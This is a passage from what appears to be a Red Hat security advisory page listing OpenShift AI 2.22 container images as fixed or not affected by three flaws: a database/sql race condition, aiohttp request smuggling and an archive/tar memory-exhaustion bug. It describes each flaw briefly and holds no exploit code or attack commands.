| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64 | — |
Workaround
|
Threats
Impact
Important
A flaw was found in database/sql. Concurrent queries can produce unexpected results when a query is cancelled during a Scan method call on returned Rows, creating a race condition. This vulnerability allows an attacker who can initiate and cancel queries to trigger this condition, possibly leading to inconsistent data being returned to the application.
7.0 (High)
Affected products
Fixed
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64 | — |
Vendor Fix
fix
|
Known not affected
33 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64 | — |
Threats
Impact
Moderate
A request smuggling flaw was found in the aiohttp python library. If a pure Python version of aiohttp is installed, without the usual C extensions, for example, or if AIOHTTP_NO_EXTENSIONS is enabled, an attacker can execute a request smuggling attack to bypass certain firewalls or proxy protections.
CWE-444 - Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')Affected products
Fixed
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
38 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64 | — |
Workaround
|
Threats
Impact
Low
A flaw was found in the archive/tar package in the Go standard library. tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A specially crafted tar archive with a pax header indicating a big number of sparse regions can cause a Go program to try to allocate a large amount of memory, causing an out-of-memory condition and resulting in a denial of service.
7.5 (High)
Affected products
Fixed
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
38 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64 | — |
Workaround
|
|
